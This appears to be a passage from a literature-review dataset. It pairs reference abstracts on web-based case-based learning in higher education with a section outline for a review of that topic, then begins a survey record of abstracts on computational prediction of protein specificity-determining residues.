than medicine, business, and law, and suggested tha t hypertext/hypermedia may be a more efficient and effective medium to produce cases for learning environments that are problem-centered. This research project studied the effects of different hypermedia structures of web-based case representations on complex problem-solving skills and knowledge assembly in problem-centered learning environments to develop a system or model that informs the design of web-based cases for ill-structured problems across multiple disciplines. Ill-structured problems are the kinds of problems or tasks that are encountered in everyday practice requiring the integration of several content domains and possessing multiple solutions or solution paths (Jonassen, 1997). They are problems that are "situated in and emergent from a specific context" (Jonassen, 1997, p. 68) and "lacking solutions that are indisputably correct" (Kagan, 1993, p. 715). Therefore they are arguably most appropriate for engaging students in authentic activity and assessing complex problem-solving skills and knowledge transfer. THEORETICAL FRAMEWORK Duffy and Cunningham (1996) identified five strategies for using problems in instruction: (a) the problem as an example; (b) the problem as an integrator or test; (c) the problem as a guide; (d) the problem as a vehicle for process; and (e) the problem as a stimulus for authentic activity. This research project focused on their strategy of using the problem as a stimulus for authentic activity. Authentic activity is most simply defined as the ordinary practices of a culture, namely, coherent, meaningful, and purposeful activities (Brown, Collins, & Duguid, 1989). More specifically, an authentic learning task for students should have the following characteristics. It should: (a) cue the leaner to the desired solution(s) in order to promote "free exploration" or self-directed inquiry; (b) allow multiple solutions or solution paths; (c) have no explicit means for determining appropriate action; (d) be perceived as real or consequential by the learner to promote ownership of the problem; and (e) possess multiple criteria for evaluating solutions. … --- paper_title: The Early History of Case-Based Instruction: Insights for Teacher Education Today. paper_content: This examination of early efforts to use the case method of instruction in business and education at Harvard provides historical insights for those currently contemplating the use of cases in the education of teachers. Conceptual clarity about the purpose of case instruction and administrative and financial support for coordinated case writing by faculty are suggested as reasons why the method took hold in business but not in education. --- paper_title: The influence of discussion groups in a case-based learning environment paper_content: The common practice of using discussion groups during case-based learning makes the role of discussion important in these learning environments. However, little empirical research has been done to investigate the influence of discussion on performance and motivation in case-based learning. The purpose of this article is to present the results of a study conducted to examine the role of discussion groups in a case-based environment. College students completed two cases either individually or in small discussion groups. Measures included two case analyses, an attitude survey, time on task, and document analysis. Results revealed significant performance and time differences between instructional methods on the first case, but not on the second case. In addition, results indicated significant differences in student attitudes between treatments. Overall, participants who worked in groups liked their method significantly better than those who worked alone, felt they learned more working in a group than they would have working alone, and expressed a preference for working in a group if they had to do the class over again. Implications for implementing case-based learning and future research are discussed. --- paper_title: Putting Case-Based Instruction Into Context: Examples From Legal and Medical Education paper_content: Recently, educational theorists have begun to emphasize the importance of situating instruction in meaningful contexts in order to recreate some of the advantages of apprenticeship learning. Cognitive apprenticeship and anchored instruction are two approaches to instruction that provide guidance for teaching in contextualized ways. Cognitive apprenticeship emphasizes the social context of instruction and draws its inspiration from traditional apprenticeships. Anchored instruction provides a model for creating problem contexts that enables students to see the utility of knowledge and to understand the conditions for its use. Together, these two complementary approaches provide a framework for thinking about apprenticeship learning and how it might be transferred to the classroom. Interestingly, authors who have written about cognitive apprenticeships and anchored instruction have made only passing reference to the case method of legal and business education and the problem-based learning approach to medical education, two well-established methods of instruction that are also based on apprenticeship learning and the study of authentic problems or cases. The detailed description of these two approaches to instruction in this article provides a rich source of information about how to create contextualized learning environments in school settings, and demonstrates that case-based instruction can take on different forms and be used in different domains. Each approach is evaluated employing a framework synthesized from cognitive apprenticeship and anchored instruction; the results of this analysis are used to suggest research questions for case-based instruction as it is currently practiced and areas in which further research is needed to refine educational theories. --- paper_title: Using Video-Based Anchored Instruction To Enhance Learning: Taiwan's Experience. paper_content: The purpose of this study is to investigate the effects of computer-assisted videodisc-based anchored instruction on attitudes toward mathematics and instruction as well as problem-solving skills among Taiwanese elementary students. Results from a t-test indicate a significant main effect on student attitudes toward mathematics. Results from a two-way Repeated Measures ANOVA show that students' problem-solving skills improve significantly with anchored instruction. Results also indicate that all the students benefit from the effects of anchored instruction on their problem-solving performance regardless of their mathematics and science abilities. The findings suggest that video-based anchored instruction provide a more motivating environment that enhanced students' problem-solving skills. This study is significant because it establishes an example of video-based anchored instruction for Taiwanese students and also provides empirical evidence of its effects on affective and cognitive responses among fifth graders in learning mathematics. This study is helpful to educators who want to help students learn to think and learn throughout technology. --- paper_title: Enhancing active learning in microbiology through case based learning: Experiences from an Indian medical school paper_content: Background: Case-based learning (CBL) is an interactive student-centered exploration of real life situations. This paper describes the use of CBL as an educational strategy for promoting active learning in microbiology. Materials and Methods: CBL was introduced in the microbiology curriculum for the second year medical students after an orientation program for faculty and students. After intervention, the average student scores in CBL topics were compared with scores obtained in lecture topics. An attempt was also made to find the effect of CBL on the academic performance. Student and faculty perception on CBL were also recorded. Results: In a cross sectional survey conducted to assess the effectiveness of CBL, students responded that, apart from helping them acquire substantive knowledge in microbiology, CBL sessions enhanced their analytic, collaborative, and communication skills. The block examination scores in CBL topics were significantly higher than those obtained for lecture topics. Faculty rated the process to be highly effective in stimulating student interest and long term retention of microbiology knowledge. The student scores were significantly higher in the group that used CBL, compared to the group that had not used CBL as a learning strategy. Conclusion: Our experience indicated that CBL sessions enhanced active learning in microbiology. More frequent use of CBL sessions would not only help the student gain requisite knowledge in microbiology but also enhance their analytic and communication skills. --- paper_title: Implications For The Design Of Online Case-Based Learning Activities Based On The Student Blended Learning Experience paper_content: An evidence based approach was adopted in the redesign of online learning resources for undergraduates in a professional Veterinary Science degree program. Students used online case based resources in blended learning activities to extend and enhance their understanding of the theories underpinning Veterinary Science and to develop their skills in clinical problem solving. This study investigates what the students thought they were learning through the case studies and how the students engaged with the activities. It then discusses the implications of the students’ experience of the materials for improving the design of the activities. --- paper_title: Multidisciplinary case-based learning for undergraduate students paper_content: This report describes the introduction of case-based learning into the final-year dental programme at the Dublin Dental School. Students attended a series of one-hour sessions in groups of 8. Each group appointed a chairman for each session and a tutor facilitated the discussion. Case details were provided during the session with relevant diagnostic records. At weekly discussion sessions, the group findings and treatment options were considered. The diagnosis and treatment plans were then discussed by clinicians involved in the treatment of the case. Following the last session, the case-based learning programme was evaluated by means of a questionnaire distributed to both tutors and students. Both students and tutors rated the sessions positively. Case-based learning was found to be a worthwhile progression from problem-based learning. --- paper_title: Improving User Satisfaction via a Case-Enhanced E-Learning Environment paper_content: Purpose – The purpose of this paper is to examine students’ experiences with a case‐enhanced e‐learning environment in a higher‐education institute.Design/methodology/approach – In total, 67 graduate students volunteered to take part in this experiment. The participants were assigned to treatment groups using tutorial with case‐based learning (CBL) module or comparison groups using tutorial only. They completed a background survey, a technological proficiency survey, a pre‐ and post‐knowledge test, and a learner perception survey of the e‐learning environment.Findings – The present study found a significant increase in the level of domain knowledge in both a tutorial‐only group and a tutorial with CBL module group. The tutorial with CBL group scored significantly higher on learners’ perceptions of the e‐learning environment in terms of ease of use, satisfaction, and usefulness. In addition, the results of the use of a CBL module based on individual differences such as gender, degree level, and information... ---
Title: Case-Based Learning on Web in Higher Education: A Review of Empirical Research Section 1: Introduction Description 1: Introduce the topic of case-based learning on the web in higher education, its rationale, and the purpose of the review. Section 2: Case-Based Learning on Web Description 2: Define case-based learning and discuss its benefits and characteristics, especially when implemented on the web. Section 3: Method Description 3: Describe the methodology used for the review, including the guidelines followed, the unit of analysis, and the coding scheme. Section 4: Sources of Data Description 4: Outline the data sources, including the stages of search, types of articles reviewed, and the databases used. Section 5: Findings Description 5: Summarize the main findings from the reviewed articles, grouped into case-based learning on web usage profile and effects on performance and affective outcomes. Section 6: Case-Based Learning on Web Usage Profile Description 6: Describe the disciplines where CBL on web is used and how students and instructors utilize it. Section 7: Effects of Case-Based Learning on Web Description 7: Discuss the effects of CBL on performance outcomes and affective outcomes, including attitudes and satisfaction. Section 8: Conclusion Description 8: Summarize the limitations of previous studies, implications for practice, and suggest directions for future research on CBL on web in higher education.
A survey on prediction of specificity-determining sites in proteins
10
--- paper_title: In silico discovery of enzyme-substrate specificity-determining residue clusters. paper_content: The binding between an enzyme and its substrate is highly specific, despite the fact that many different enzymes show significant sequence and structure similarity. There must be, then, substrate specificity-determining residues that enable different enzymes to recognize their unique substrates. We reason that a coordinated, not independent, action of both conserved and non-conserved residues determine enzymatic activity and specificity. Here, we present a surface patch ranking (SPR) method for in silico discovery of substrate specificity-determining residue clusters by exploring both sequence conservation and correlated mutations. As case studies we apply SPR to several highly homologous enzymatic protein pairs, such as guanylyl versus adenylyl cyclases, lactate versus malate dehydrogenases, and trypsin versus chymotrypsin. Without using experimental data, we predict several single and multi-residue clusters that are consistent with previous mutagenesis experimental results. Most single-residue clusters are directly involved in enzyme–substrate interactions, whereas multi-residue clusters are vital for domain–domain and regulator–enzyme interactions, indicating their complementary role in specificity determination. These results demonstrate that SPR may help the selection of target residues for mutagenesis experiments and, thus, focus rational drug design, protein engineering, and functional annotation to the relevant regions of a protein. --- paper_title: High Resolution Crystal Structures of Human Rab5a and Five Mutants with Substitutions in the Catalytically Important Phosphate-Binding Loop paper_content: Abstract GTPase domain crystal structures of Rab5a wild type and five variants with mutations in the phosphate-binding loop are reported here at resolutions up to 1.5 A. Of particular interest, the A30P mutant was crystallized in complexes with GDP, GDP+AlF3, and authentic GTP, respectively. The other variant crystals were obtained in complexes with a non-hydrolyzable GTP analog, GppNHp. All structures were solved in the same crystal form, providing an unusual opportunity to compare structures of small GTPases with different catalytic rates. The A30P mutant exhibits dramatically reduced GTPase activity and forms a GTP-bound complex stable enough for crystallographic analysis. Importantly, the A30P structure with bound GDP plus AlF3has been solved in the absence of a GTPase-activating protein, and it may resemble that of a transition state intermediate. Conformational changes are observed between the GTP-bound form and the transition state intermediate, mainly in the switch II region containing the catalytic Gln79 residue and independent of A30P mutation-induced local alterations in the P-loop. The structures suggest an important catalytic role for a P-loop backbone amide group, which is eliminated in the A30P mutant, and support the notion that the transition state of GTPase-mediated GTP hydrolysis is of considerable dissociative character. --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. ::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: The Rab GTPase family paper_content: SUMMARY ::: The Rab family is part of the Ras superfamily of small GTPases. There are at least 60 Rab genes in the human genome, and a number of Rab GTPases are conserved from yeast to humans. The different Rab GTPases are localized to the cytosolic face of specific intracellular membranes, where they function as regulators of distinct steps in membrane traffic pathways. In the GTP-bound form, the Rab GTPases recruit specific sets of effector proteins onto membranes. Through their effectors, Rab GTPases regulate vesicle formation, actin- and tubulin-dependent vesicle movement, and membrane fusion. --- paper_title: Using evolutionary information to find specificity-determining and co-evolving residues. paper_content: Intricate networks of protein interactions rely on the ability of a protein to recognize its targets: other proteins, ligands, and sites on DNA and RNA. To recognize other molecules, it was suggested that a protein uses a small set of specificity-determining residues (SDRs). How can one find these residues in proteins and distinguish them from other functionally important amino acids? A number of bioinformatics methods to predict SDRs have been developed in recent years. These methods use genomic information and multiple sequence alignments to identify positions exhibiting a specific pattern of conservation and variability. The challenge is to delineate the evolutionary pattern of SDRs from that of the active site residues and the residues responsible for formation of the protein's structure. The phylogenetic history of a protein family makes such analysis particularly hard. Here we present two methods for finding the SDRs and the co-evolving residues (CERs) in proteins. We use a Monte Carlo approach for statistical inference, allowing us to reveal specific evolutionary patterns of SDRs and CERs. We apply these methods to study specific recognition in the bacterial two-component system and in the class Ia aminoacyl-tRNA synthetases. Our results agree well with structural information and the experimental analyses of these systems. Our results point at the complex and distinct patterns characteristic of the evolution of specificity in these systems. --- paper_title: An evolutionary trace method defines binding surfaces common to protein families paper_content: X-ray or NMR structures of proteins are often derived without their ligands, and even when the structure of a full complex is available, the area of contact that is functionally and energetically significant may be a specialized subset of the geometric interface deduced from the spatial proximity between ligands. Thus, even after a structure is solved, it remains a major theoretical and experimental goal to localize protein functional interfaces and understand the role of their constituent residues. The evolutionary trace method is a systematic, transparent and novel predictive technique that identifies active sites and functional interfaces in proteins with known structure. It is based on the extraction of functionally important residues from sequence conservation patterns in homologous proteins, and on their mapping onto the protein surface to generate clusters identifying functional interfaces. The SH2 and SH3 modular signaling domains and the DNA binding domain of the nuclear hormone receptors provide tests for the accuracy and validity of our method. In each case, the evolutionary trace delineates the functional epitope and identifies residues critical to binding specificity. Based on mutational evolutionary analysis and on the structural homology of protein families, this simple and versatile approach should help focus site-directed mutagenesis studies of structure-function relationships in macromolecules, as well as studies of specificity in molecular recognition. More generally, it provides an evolutionary perspective for judging the functional or structural role of each residue in protein structure. --- paper_title: RB: Analysis and prediction of functional sub-types from protein sequence alignments paper_content: The increasing number and diversity of protein sequence families requires new methods to define and predict details regarding function. Here, we present a method for analysis and prediction of functional sub-types from multiple protein sequence alignments. Given an alignment and set of proteins grouped into sub-types according to some definition of function, such as enzymatic specificity, the method identifies positions that are indicative of functional differences by comparison of sub-type specific sequence profiles, and analysis of positional entropy in the alignment. Alignment positions with significantly high positional relative entropy correlate with those known to be involved in defining sub-types for nucleotidyl cyclases, protein kinases, lactate/malate dehydrogenases and trypsin-like serine proteases. We highlight new positions for these proteins that suggest additional experiments to elucidate the basis of specificity. The method is also able to predict sub-type for unclassified sequences. We assess several variations on a prediction method, and compare them to simple sequence comparisons. For assessment, we remove close homologues to the sequence for which a prediction is to be made (by a sequence identity above a threshold). This simulates situations where a protein is known to belong to a protein family, but is not a close relative of another protein of known sub-type. Considering the four families above, and a sequence identity threshold of 30 %, our best method gives an accuracy of 96 % compared to 80 % obtained for sequence similarity and 74 % for BLAST. We describe the derivation of a set of sub-type groupings derived from an automated parsing of alignments from PFAM and the SWISSPROT database, and use this to perform a large-scale assessment. The best method gives an average accuracy of 94 % compared to 68 % for sequence similarity and 79 % for BLAST. We discuss implications for experimental design, genome annotation and the prediction of protein function and protein intra-residue distances. --- paper_title: Automatic methods for predicting functionally important residues paper_content: Sequence analysis is often the first guide for the prediction of residues in a protein family that may have functional significance. A few methods have been proposed which use the division of protein families into subfamilies in the search for those positions that could have some functional significance for the whole family, but at the same time which exhibit the specificity of each subfamily (“Tree-determinant residues”). However, there are still many unsolved questions like the best division of a protein family into subfamilies, or the accurate detection of sequence variation patterns characteristic of different subfamilies. Here we present a systematic study in a significant number of protein families, testing the statistical meaning of the Tree-determinant residues predicted by three different methods that represent the range of available approaches. The first method takes as a starting point a phylogenetic representation of a protein family and, following the principle of Relative Entropy from Information Theory, automatically searches for the optimal division of the family into subfamilies. The second method looks for positions whose mutational behavior is reminiscent of the mutational behavior of the full-length proteins, by directly comparing the corresponding distance matrices. The third method is an automation of the analysis of distribution of sequences and amino acid positions in the corresponding multidimensional spaces using a vector-based principal component analysis. These three methods have been tested on two non-redundant lists of protein families: one composed by proteins that bind a variety of ligand groups, and the other composed by proteins with annotated functionally relevant sites. In most cases, the residues predicted by the three methods show a clear tendency to be close to bound ligands of biological relevance and to those amino acids described as participants in key aspects of protein function. These three automatic methods provide a wide range of possibilities for biologists to analyze their families of interest, in a similar way to the one presented here for the family of proteins related with ras-p21. --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: Supervised multivariate analysis of sequence groups to identify specificity determining residues paper_content: BackgroundProteins that evolve from a common ancestor can change functionality over time, and it is important to be able identify residues that cause this change. In this paper we show how a supervised multivariate statistical method, Between Group Analysis (BGA), can be used to identify these residues from families of proteins with different substrate specifities using multiple sequence alignments.ResultsWe demonstrate the usefulness of this method on three different test cases. Two of these test cases, the Lactate/Malate dehydrogenase family and Nucleotidyl Cyclases, consist of two functional groups. The other family, Serine Proteases consists of three groups. BGA was used to analyse and visualise these three families using two different encoding schemes for the amino acids.ConclusionThis overall combination of methods in this paper is powerful and flexible while being computationally very fast and simple. BGA is especially useful because it can be used to analyse any number of functional classes. In the examples we used in this paper, we have only used 2 or 3 classes for demonstration purposes but any number can be used and visualised. --- paper_title: Protein sequence alignments: a strategy for the hierarchical analysis of residue conservation paper_content: An algorithm is described for the systematic characterization of the physico-chemical properties seen at each position in a multiple protein sequence alignment. The new algorithm allows questions important in the design of mutagenesis experiments to be quickly answered since positions in the alignment that show unusual or interesting residue substitution patterns may be rapidly identified. The strategy is based on a flexible set-based description of amino acid properties, which is used to define the conservation between any group of amino acids. Sequences in the alignment are gathered into subgroups on the basis of sequence similarity, functional, evolutionary or other criteria. All pairs of subgroups are then compared to highlight positions that confer the unique features of each subgroup. The algorithm is encoded in the computer program AMAS (Analysis of Multiply Aligned Sequences) which provides a textual summary of the analysis and an annotated (boxed, shaded and/or coloured) multiple sequence alignment. The algorithm is illustrated by application to an alignment of 67 SH2 domains where patterns of conserved hydrophobic residues that constitute the protein core are highlighted. The analysis of charge conservation across annexin domains identifies the locations at which conserved charges change sign. The algorithm simplifies the analysis of multiple sequence data by condensing the mass of information present, and thus allows the rapid identification of substitutions of structural and functional importance. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Maximum-Likelihood Approach for Gene Family Evolution Under Functional Divergence paper_content: According to the observed alignment pattern (i.e., amino acid configuration), we studied two basic types of functional divergence of a protein family. Type I functional divergence after gene duplication results in altered functional constraints (i.e., different evolutionary rate) between duplicate genes, whereas type II results in no altered functional constraints but radical change in amino acid property between them (e.g., charge, hydrophobicity, etc.). Two statistical approaches, i.e., the subtree likelihood and the whole-tree likelihood, were developed for estimating the coefficients of (type I or type II) functional divergence. Numerical algorithms for obtaining maximum-likelihood estimates are also provided. Moreover, a posterior-based site-specific profile is implemented to predict critical amino acid residues that are responsible for type I and/or type II functional divergence after gene duplication. We compared the current likelihood with a fast method developed previously by examples; both show similar results. For handling altered functional constraints (type I functional divergence) in the large gene family with many member genes (clusters), which appears to be a normal case in postgenomics, the subtree likelihood provides a solution that is computationally feasible and robust against the uncertainty of the phylogeny. The cost of this feasibility is the approximation when frequencies of amino acids are very skewed. The potential bias and correction are discussed. --- paper_title: Separation of phylogenetic and functional associations in biological sequences by using the parametric bootstrap. paper_content: Quantitative analyses of biological sequences generally proceed under the assumption that individual DNA or protein sequence elements vary independently. However, this assumption is not biologically realistic because sequence elements often vary in a concerted manner resulting from common ancestry and structural or functional constraints. We calculated intersite associations among aligned protein sequences by using mutual information. To discriminate associations resulting from common ancestry from those resulting from structural or functional constraints, we used a parametric bootstrap algorithm to construct replicate data sets. These data are expected to have intersite associations resulting solely from phylogeny. By comparing the distribution of our association statistic for the replicate data against that calculated for empirical data, we were able to assign a probability that two sites covaried resulting from structural or functional constraint rather than phylogeny. We tested our method by using an alignment of 237 basic helix-loop-helix (bHLH) protein domains. Comparison of our results against a solved three-dimensional structure confirmed the identification of several sites important to function and structure of the bHLH domain. This analytical procedure has broad utility as a first step in the identification of sites that are important to biological macromolecular structure and function when a solved structure is unavailable. --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplemenmtary data are available at Bioinformatics online --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web sever for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/ programs/shmrwww. --- paper_title: Emerging methods in protein co-evolution paper_content: Functional interactions between proteins and within proteins results in co-evolutionary signatures in amino acid sequences that serve as clues to various forms of interdependence. This Review discusses the principles and distinctions of the large range of computational tools to analyse protein co-evolution and the biological insight that they are providing. --- paper_title: Classification of protein families and detection of the determinant residues with an improved self-organizing map paper_content: Using a SOM (self-organizing map) we can classify sequences within a protein family into subgroups that generally correspond to biological subcategories. These maps tend to show sequence similarity as proximity in the map. Combining maps generated at different levels of resolution, the structure of relations in protein families can be captured that could not otherwise be represented in a single map. The underlying representation of maps enables us to retrieve characteristic sequence patterns for individual subgroups of sequences. Such patterns tend to correspond to functionally important regions. We present a modified SOM algorithm that includes a convergence test that dynamically controls the learning parameters to adapt them to the learning set instead of being fixed and externally optimized by trial and error. Given the variability of protein family size and distribution, the addition of this features is necessary. The method is successfully tested with a number of families. The rab family of small GTPases is used to illustrate the performance of the method. --- paper_title: The structure of human neuronal Rab6B in the active and inactive form paper_content: The Rab small G-protein family plays important roles in eukaryotes as regulators of vesicle traffic. In Rab proteins, the hydrolysis of GTP to GDP is coupled with association with and dissociation from membranes. Conformational changes related to their different nucleotide states determine their effector specificity. The crystal structure of human neuronal Rab6B was solved in its 'inactive' (with bound MgGDP) and 'active' (MgGTP gamma S-bound) forms to 2.3 and 1.8 angstrom, respectively. Both crystallized in space group P2(1)2(1)2(1), with similar unit-cell parameters, allowing the comparison of both structures without packing artifacts. Conformational changes between the inactive GDP and active GTP-like state are observed mainly in the switch I and switch II regions, confirming their role as a molecular switch. Compared with other Rab proteins, additional changes are observed in the Rab6 subfamily-specific RabSF3 region that might contribute to the specificity of Rab6 for its different effector proteins. --- paper_title: [29] Identification of functional residues and secondary structure from protein multiple sequence alignment paper_content: Publisher Summary This chapter describes a strategy for the hierarchical analysis of residue conservation and the identification of functional residues and secondary structure from protein multiple sequence alignment. Hierarchical methods of alignment cope with large numbers of sequences and give reasonably accurate alignments. Having generated the alignment, the problem is to find out what it can tell us about the protein family. Interpretation of alignments can be, particularly difficult when there are large numbers of sequences to examine. The method allows the residue-specific similarities and differences in physicochemical properties among groups of sequences to be identified quickly. The method also highlights conserved positions across a complete alignment and, thus, can help to identify patterns characteristic of regular secondary structures. The chapter also discusses a procedure for applying these patterns in secondary structure prediction and evaluates their predictive power in six blind secondary-structure predictions. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: Predicting functional residues of protein sequence alignments as a feature selection task paper_content: Determining which residues within a multiple alignment of protein sequences are most responsible for protein function is a difficult and important task in bioinformatics. Here, we show that this task is an application of the standard Feature Selection (FS) problem. We show the comparison of standard FS techniques with more specialised algorithms on a range of data sets backed by experimental evidence, and find that some standard algorithms perform as well as specialised ones. We also discuss how considering the discriminating power of combinations of residue positions, rather than the power of each position individually, has the potential to improve the performance of such algorithms. --- paper_title: Using multiple interdependency to separate functional from phylogenetic correlations in protein alignments paper_content: Motivation: Multiple sequence alignments of homologous proteins are useful for inferring their phylogenetic history and to reveal functionally important regions in the proteins. Functional constraints may lead to co-variation of two or more amino acids in the sequence, such that a substitution at one site is accompanied by compensatory substitutions at another site. It is not sufficient to find the statistical correlations between sites in the alignment because these may be the result of several undetermined causes. In particular, phylogenetic clustering will lead to many strong correlations. Result: Ap rocedure is developed to detect statistical correlations stemming from functional interaction by removing the strong phylogenetic signal that leads to the correlations of each site with many others in the sequence. Our method relies upon the accuracy of the alignment but it does not require any assumptions about the phylogeny or the substitution process. The effectiveness of the method wa sv erified using computer simulations and then applied to predict functional interactions between amino acids in the Pfam database of alignments. Availability: The program and supplementary figures tables are available from the site http://www.uhnres.utoronto. --- paper_title: Spial: analysis of subtype-specific features in multiple sequence alignments of proteins paper_content: Motivation: Spial (Specificity in alignments) is a tool for the comparative analysis of two alignments of evolutionarily related sequences that differ in their function, such as two receptor subtypes. It highlights functionally important residues that are either specific to one of the two alignments or conserved across both alignments. It permits visualization of this information in three complementary ways: by colour-coding alignment positions, by sequence logos and optionally by colour-coding the residues of a protein structure provided by the user. This can aid in the detection of residues that are involved in the subtype-specific interaction with a ligand, other proteins or nucleic acids. Spial may also be used to detect residues that may be post-translationally modified in one of the two 